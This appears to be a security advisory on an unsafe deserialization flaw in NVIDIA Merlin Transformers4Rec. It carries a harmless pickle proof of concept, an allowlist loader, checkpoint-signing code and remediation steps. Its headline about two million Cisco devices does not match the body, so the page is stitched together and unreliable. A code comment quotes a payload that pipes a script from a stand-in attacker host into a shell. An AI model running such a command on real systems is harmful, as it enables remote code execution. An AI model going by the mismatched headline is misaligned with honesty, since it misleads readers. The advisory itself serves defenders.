Up to 2 Million Cisco Devices Hit by Actively Exploited Zero-Day
September 25, 2025
Severity
High
Analysis Summary
A critical vulnerability (CVE-2025-23298) was discovered in NVIDIA’s Merlin Transformers4Rec library, allowing unauthenticated attackers to achieve remote code execution (RCE) with root privileges. The flaw stems from unsafe deserialization in the load_model_trainer_states_from_checkpoint function, which relies on PyTorch’s torch.load() without safety parameters. Because torch.load() internally uses Python’s pickle module, attackers can craft malicious checkpoint files containing arbitrary code that executes when loaded, posing a severe risk in machine learning (ML) environments where checkpoints are frequently exchanged.
The attack is enabled by the library’s use of cloudpickle to load model classes directly, which grants the checkpoint file full control of the deserialization process. By defining a custom __reduce__ method in a malicious checkpoint, attackers can execute arbitrary system commands, such as fetching and running remote scripts. The danger is amplified because ML practitioners often download pre-trained models from public repositories or cloud sources, and production ML pipelines typically operate with elevated privileges, enabling potential escalation to root-level access.
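The __reduce__ mechanism can be illustrated with a few lines of plain pickle, which stands in here for torch.load() (torch.load() uses pickle internally). This is a harmless sketch, not the actual exploit: the class name is hypothetical, and the payload calls eval() on arithmetic instead of running a shell command.

```python
import io
import pickle

# Illustrative sketch only -- plain pickle stands in for torch.load(),
# and "MaliciousCheckpoint" is a hypothetical name, not real exploit code.
class MaliciousCheckpoint:
    def __reduce__(self):
        # pickle calls __reduce__ to learn how to rebuild the object and
        # invokes whatever callable it returns. A real payload would be
        # something like (os.system, ("curl http://attacker/x | sh",));
        # this harmless stand-in calls eval() on arithmetic instead.
        return (eval, ("6 * 7",))

payload = pickle.dumps(MaliciousCheckpoint())
result = pickle.load(io.BytesIO(payload))  # attacker-chosen callable runs
                                           # here, before any weights exist
print(result)  # -> 42: eval("6 * 7") executed inside pickle.load()
```

The key point is that the callable runs as a side effect of loading the file itself, which is why no model weights need to be restored for the attack to succeed.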
Researchers demonstrated the flaw by embedding shell commands in a crafted checkpoint, which executed immediately upon loading before any model weights were restored. NVIDIA addressed the issue in pull request #802 by introducing a safer custom load() function that restricts deserialization to approved classes and enforces input validation within serialization.py. Additionally, developers are advised to set weights_only=True when using torch.load() to mitigate exposure to untrusted pickle objects.
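An allowlist-based loader in the spirit of the fix can be sketched with a restricted unpickler. The allowlist contents and function names below are illustrative assumptions, not the actual code from serialization.py or PR #802.

```python
import io
import pickle

# Sketch of allowlist-restricted deserialization; the allowlist and the
# safe_load() name are illustrative, not NVIDIA's actual implementation.
SAFE_CLASSES = {("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only explicitly approved classes may be reconstructed; anything
        # else (os.system, eval, custom __reduce__ targets) is rejected
        # before any attacker-controlled code can run.
        if (module, name) in SAFE_CLASSES:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked class: {module}.{name}")

def safe_load(buf):
    return RestrictedUnpickler(buf).load()
```

With a loader like this, a benign OrderedDict state dict round-trips normally, while a checkpoint whose __reduce__ points at eval or os.system raises UnpicklingError instead of executing.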
The vulnerability affects Merlin Transformers4Rec versions v1.5.0 and earlier and carries a Critical CVSS 3.1 rating. To reduce risk, organizations are urged to avoid pickle for untrusted data, adopt safer formats such as Safetensors or ONNX, enforce cryptographic signing of model files, and sandbox deserialization processes. More broadly, the ML/AI community must shift toward security-first design principles and phase out pickle-based mechanisms entirely, as their inherent insecurity guarantees that similar RCE vulnerabilities will continue to surface.
Impact
- Privilege Escalation
- Code Execution
- Gain Access
Indicators of Compromise
CVE
CVE-2025-23298
Affected Vendors
- NVIDIA
Affected Products
- NVIDIA Merlin Transformers4Rec
Remediation
- Update to the patched version of NVIDIA Merlin Transformers4Rec (v1.5.1 or later) that replaces unsafe pickle deserialization with a custom load() function.
- Always use weights_only=True when calling torch.load() to restrict deserialization to tensor data and prevent execution of arbitrary objects.
- Avoid using Python’s pickle or cloudpickle for untrusted or third-party checkpoint files.
- Prefer safer model formats such as Safetensors or ONNX for storing and sharing model checkpoints.
- Enforce cryptographic signing and verification of model files before loading them in production ML environments.
- Run ML pipelines and model-serving processes with least privilege (non-root accounts) to reduce the impact of potential exploits.
- Sandbox deserialization operations to isolate potentially unsafe code execution from critical systems.
- Incorporate ML frameworks and model pipelines into regular security audits and supply chain risk assessments.
- Establish policies that mandate a zero-trust approach to external model files and third-party ML artifacts.
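The "sign and verify before loading" recommendation above can be sketched with an HMAC-SHA256 tag over the checkpoint bytes. The key handling and helper names are hypothetical, and a production setup would typically use asymmetric signatures (so verifiers never hold a signing secret) rather than a shared HMAC key.

```python
import hashlib
import hmac

# Hypothetical helpers sketching checkpoint signing; a real deployment
# would manage the key in a secrets store and prefer asymmetric signing.
SIGNING_KEY = b"replace-with-a-managed-secret"

def sign_checkpoint(data: bytes) -> str:
    # Tag computed over the raw checkpoint bytes at publish time.
    return hmac.new(SIGNING_KEY, data, hashlib.sha256).hexdigest()

def verify_checkpoint(data: bytes, tag: str) -> bool:
    # hmac.compare_digest gives a constant-time comparison, avoiding
    # timing side channels when checking the tag.
    return hmac.compare_digest(sign_checkpoint(data), tag)

blob = b"...model checkpoint bytes..."
tag = sign_checkpoint(blob)
assert verify_checkpoint(blob, tag)          # untampered file may be loaded
assert not verify_checkpoint(b"evil", tag)   # tampered file is refused
```

Verification must happen before deserialization, so a tampered checkpoint is rejected without ever reaching pickle.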